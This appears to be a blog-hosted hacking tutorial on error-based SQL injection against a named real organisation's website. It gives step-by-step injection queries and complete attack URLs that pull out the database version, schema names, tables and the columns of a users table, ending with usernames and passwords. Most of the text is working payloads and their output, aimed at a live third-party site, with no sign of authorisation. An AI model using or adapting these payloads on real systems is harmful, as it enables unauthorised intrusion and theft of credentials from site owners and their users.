It's definitely another type but in this case, I call it Union-Error based, since it involves Union Select in the queries we're about to use.
So let's get started
In this example we're gonna be using this site (which was asked by a member in -Downfall's thread):
Code:
http://www.seenpm.org/The vulnerable link would be:
Code:
http://www.seenpm.org/new/index.php?id=151'Before I go further, let me explain some of the SQL functions we're gonna be using in this tutorial, so that you'll have an idea how the query works. Please read carefully
Code:
count(*) = Returns the total number of records in the table/view
group by = Groups the result of the query set by one or more columns
concat = shows the results in one column
information_schema = The default database
table_schema = Specified database
table_name = The current table name
limit = Limits the amount of content to be displayed
mid() = Used to extract characters from a text fieldhttp://www.w3schools.com/sql/sql_functions.asp
NOTE: Make sure to organize the query if you're just gonna copy and paste!
There could be some spaces in between
Getting the version of their database (2 main ways to do it):
First way:
Query:
Code:
+AND(SELECT COUNT(*) FROM
(SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by CONCAT((SELECT
version() FROM information_schema.tables LIMIT 0,1),FLOOR(RAND(0)*2)))URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+AND(SELECT
COUNT(*) FROM (SELECT 1 UNION SELECT null UNION SELECT !1)x GROUP by
CONCAT((SELECT version() FROM information_schema.tables LIMIT
0,1),FLOOR(RAND(0)*2)))Results:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'Second way:
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+from+information_
schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- xURL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,version(),0x7e)+f
rom+information_schema.tables+limit+0,1),1,25),floor(rand(0)*2)))a)-- xResults:
Code:
Duplicate entry '5.1.54-msl-usrs-sure2-log1' for key 'group_key'Screenshot:
Spoiler (Click to Hide)
![[Image: lOnau.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vvx06MzPkRODZs_gWsmmj_5cKmqb-619Tbp5E5S_NyA_6--MxOUk-ETDNtt5SRsZTzn4R67ireMWJoi8xr7w=s0-d)
Now that we've got the version, let's extract the database:
Query used:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(schema_name),0x7e)+f
rom+information_schema.schemata limit+0,1),1,25),floor(rand(0)*2)))a)--
xURL will look like this:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(sche
ma_name),0x7e)+from+information_schema.schemata
limit+0,1),1,25),floor(rand(0)*2)))a)-- xResults:
Code:
Duplicate entry 'information_schema,seenpm_2007~~1' for key 'group_key'Note: Notice the limit 0,1),1,150)
This is the part where I raised the ascii from 25 to 150, just in case there would have been more database
I'll explain more about the mid() function in the next step
Screenshot:
Spoiler (Click to Hide)
![[Image: QxgVN.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vRiWVxw34AlMmdls8P8zGIGlBK3Ze2gotkcMv3za4aC7degzi1Kh4coKO-GgDP8VDFTsiK71owZykiSb5H7C0=s0-d)
We have the database and version so far
Now for the tables in their current database
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+fr
om+information_schema.tables where table_schema=database()
limit+0,1),1,25),floor(rand(0)*2)))a)-- xURL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
e_name),0x7e)+from+information_schema.tables where
table_schema=database() limit+0,1),1,25),floor(rand(0)*2)))a)-- xResults:
Code:
'links,members,menu,menu_s1' for key 'group_key'Now read this carefully, notice how the tables aren't completely shown.
Only about half of em are shown. This is because of the mid() function we're using.
Leave the limit 0,1 function and don't touch it
What you need to alter now is the integers of the mid() function
i.e (mid((select+concat_ws(0x7e,group_concat(table_name),0x7e)+from+information_sche ma.tables where table_schema=database() limit+0,1),1,25)
Yes, that's right. Notice 1,25
25 can also be altered, however it's a moderate value, so leave it like that
Now, the number "1" shows the tables as soon as it's being altered.
Incrementing is what's being needed here
Lets just say, 15,25
It'll display the rest of the other tables
I've done a bit of a reckon on the site and found out that the 'users' table is located at 58,25
So the query with the URL will look like:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(tabl
e_name),0x7e)+from+information_schema.tables where
table_schema=database() limit+0,1),58,25),floor(rand(0)*2)))a)-- xResults:
Code:
Duplicate entry 'ers,u_page,u_par,users~~1' for key 'group_key'Screenshot:
Spoiler (Click to Hide)
![[Image: AVmxf.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vHsxNZot5_OS0q-OHGk14ys8WZ2BzqYzfpBBo1mNcUenMdNyzLcGJJQyxAGKeEvdD51_mKxa2ZdoqjeDskYb8=s0-d)
Now for the columns in the specified table i.e users
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(column_name),0x7e)+f
rom+information_schema.columns where table_name=0xHex_Table
limit+0,1),1,25),floor(rand(0)*2)))a)-- xNotice you have to convert the current table to Hex.
To do that, you can go to http://www.swingnote.com/tools/texttohex.php
URL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(colu
mn_name),0x7e)+from+information_schema.columns where
table_name=0x7573657273 limit+0,1),1,25),floor(rand(0)*2)))a)-- xNow notice the mid() function
I've incremented from 1,25 to 4,25
Result:
Code:
'username,password,email,n1' for key 'group_key'Screenshot:
Spoiler (Click to Hide)
![[Image: oOnBR.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_uqEXTwcPNZnEVQFjDbgywGzUzObGCL4k3v_YLqAuGGMoBHs2K6ab5PO8v1JBYKdd16m8YyJP4NkWLLKml5Y9g=s0-d)
Now to extract the data from the desired columns
Columns we have so far: "username", "password"
Query:
Code:
+and+(select+1+from+(select+count(*)+from+(select+1+union+select+2+union+select+
3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(username,0x3a,passwo
rd),0x7e)+from+users limit+0,1),1,25),floor(rand(0)*2)))a)-- xURL:
Code:
http://www.seenpm.org/new/index.php?id=151+and+(select+1+from+(select+count(*)+from+(select+1+union+select
+2+union+select+3)x+group+by+concat(mid((select+concat_ws(0x7e,group_concat(user
name,0x3a,password),0x7e)+from+users
limit+0,1),1,25),floor(rand(0)*2)))a)-- xResults:
Code:
Duplicate entry 'admin:admin,test:test~~1' for key 'group_key'Notice how I didn't increment the mid() function
This because the content is completely shown
Note: You can know that the data is completely shown when there is a ~ sign or signs
Screenshot:
![[Image: 057wa.png]](https://lh3.googleusercontent.com/blogger_img_proxy/AEn0k_vtEwiO6_cfVkXZLkSCkxgPSSkdbwBgdihXg-zEvJ_9OLwrq24R1tq0Tk7Tvui0xR4A_VUA82TnJ9jrpRNPvA=s0-d)
0 (mga) komento:
Mag-post ng isang Komento